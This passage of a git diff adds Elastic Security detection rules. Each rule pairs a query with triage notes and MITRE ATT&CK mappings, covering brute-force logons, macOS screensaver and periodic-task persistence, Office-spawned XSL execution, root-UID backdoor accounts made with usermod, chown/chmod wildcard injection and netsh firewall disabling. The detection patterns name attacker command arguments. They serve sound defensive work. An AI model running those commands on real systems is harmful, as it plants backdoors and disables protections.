too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4624", + "https://social.technet.microsoft.com/Forums/ie/en-US/c82ac4f3-a235-472c-9fd3-53aa646cfcfd/network-information-missing-in-event-id-4624?forum=winserversecurity", + "https://serverfault.com/questions/379092/remote-desktop-failed-logon-event-4625-not-logging-ip-address-on-2008-terminal-s/403638#403638" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Status", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "48b6edfc-079d-4907-b43c-baffa243270d", + "setup": "## Setup\n\n- In some cases the source network address in Windows events 4625/4624 is not populated due to Microsoft logging limitations (examples in the references links). This edge case will break the rule condition and it won't trigger an alert.\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 9 + }, + "id": "48b6edfc-079d-4907-b43c-baffa243270d_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_107.json b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_107.json new file mode 100644 index 00000000000..1d265d25b51 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_107.json @@ -0,0 +1,84 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a child process is spawned by the screensaver engine process, which is consistent with an attacker's malicious payload being executed after the screensaver activated on the endpoint. An adversary can maintain persistence on a macOS endpoint by creating a malicious screensaver (.saver) file and configuring the screensaver plist file to execute code each time the screensaver is activated.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unexpected Child Process of macOS Screensaver Engine", + "note": "## Triage and analysis\n\n- Analyze the descendant processes of the ScreenSaverEngine process for malicious code and suspicious behavior such\nas a download of a payload from a server.\n- Review the installed and activated screensaver on the host. Triage the screensaver (.saver) file that was triggered to\nidentify whether the file is malicious or not.\n", + "query": "process where host.os.type == \"macos\" and event.type == \"start\" and process.parent.name == \"ScreenSaverEngine\"\n", + "references": [ + "https://posts.specterops.io/saving-your-access-d562bf5bf90b", + "https://github.com/D00MFist/PersistentJXA" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "48d7f54d-c29e-4430-93a9-9db6b5892270", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.002", + "name": "Screensaver", + "reference": "https://attack.mitre.org/techniques/T1546/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "48d7f54d-c29e-4430-93a9-9db6b5892270_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_106.json b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_106.json new file mode 100644 index 00000000000..87ad75297c7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_106.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of the default configuration for periodic tasks. Adversaries may abuse periodic tasks to execute malicious code or maintain persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence via Periodic Tasks", + "query": "event.category:file and host.os.type:macos and not event.type:\"deletion\" and\n file.path:(/private/etc/periodic/* or /private/etc/defaults/periodic.conf or /private/etc/periodic.conf)\n", + "references": [ + "https://opensource.apple.com/source/crontabs/crontabs-13/private/etc/defaults/periodic.conf.auto.html", + "https://www.oreilly.com/library/view/mac-os-x/0596003706/re328.html", + "https://github.com/D00MFist/PersistentJXA/blob/master/PeriodicPersist.js" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "48ec9452-e1fd-4513-a376-10a1a26d2c83", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "48ec9452-e1fd-4513-a376-10a1a26d2c83_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_2.json b/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_2.json new file mode 100644 index 00000000000..ad33806fd6d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_2.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a hosted XSL script using the Microsoft.XMLDOM COM interface via Microsoft Office processes. This behavior may indicate adversarial activity to execute malicious JScript or VBScript on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote XSL Script Execution via COM", + "query": "sequence with maxspan=1m\n [library where host.os.type == \"windows\" and dll.name : \"msxml3.dll\" and\n process.name : (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\", \"mspub.exe\")] by process.entity_id\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n process.parent.name : (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\", \"mspub.exe\") and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWoW64\\\\WerFault.exe\",\n \"?:\\\\windows\\\\splwow64.exe\",\n \"?:\\\\Windows\\\\System32\\\\conhost.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*exe\")] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "48f657ee-de4f-477c-aa99-ed88ee7af97a", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1220", + "name": "XSL Script Processing", + "reference": "https://attack.mitre.org/techniques/T1220/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "48f657ee-de4f-477c-aa99-ed88ee7af97a_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_6.json b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_6.json new file mode 100644 index 00000000000..de6bf70a3f4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_6.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the attempt to create a new backdoor user by setting the user's UID to 0. Attackers may alter a user's UID to 0 to establish persistence on a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Backdoor User Account Creation", + "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"usermod\" and process.args : \"-u\" and process.args : \"0\" and process.args : \"-o\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "494ebba4-ecb7-4be4-8c6f-654c686549ad", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "494ebba4-ecb7-4be4-8c6f-654c686549ad_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_5.json b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_5.json new file mode 100644 index 00000000000..aff4c58545e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_5.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of the \"chown\" and \"chmod\" commands with command line flags that could indicate a wildcard injection attack. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Unauthorized Access via Wildcard Injection Detected", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name in (\"chown\", \"chmod\") and process.args == \"-R\" and process.args : \"--reference=*\"\n", + "references": [ + "https://www.exploit-db.com/papers/33930" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "4a99ac6f-9a54-4ba5-a64f-6eb65695841b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.008", + "name": "/etc/passwd and /etc/shadow", + "reference": "https://attack.mitre.org/techniques/T1003/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "4a99ac6f-9a54-4ba5-a64f-6eb65695841b_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_109.json b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_109.json new file mode 100644 index 00000000000..a902564c7c6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_109.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the netsh.exe to disable or weaken the local firewall. Attackers will use this command line tool to disable the firewall during troubleshooting or to enable network mobility.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disable Windows Firewall Rules via Netsh", + "note": "## Triage and analysis\n\n### Investigating Disable Windows Firewall Rules via Netsh\n\nThe Windows Defender Firewall is a native component which provides host-based, two-way network traffic filtering for a device, and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing troubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"netsh.exe\" and\n (\n (process.args : \"disable\" and process.args : \"firewall\" and process.args : \"set\") or\n (process.args : \"advfirewall\" and process.args : \"off\" and process.args : \"state\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "4b438734-3793-4fda-bd42-ceeada0be8f9_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_110.json b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_110.json new file mode 100644 index 00000000000..cc3612343f5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_110.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + 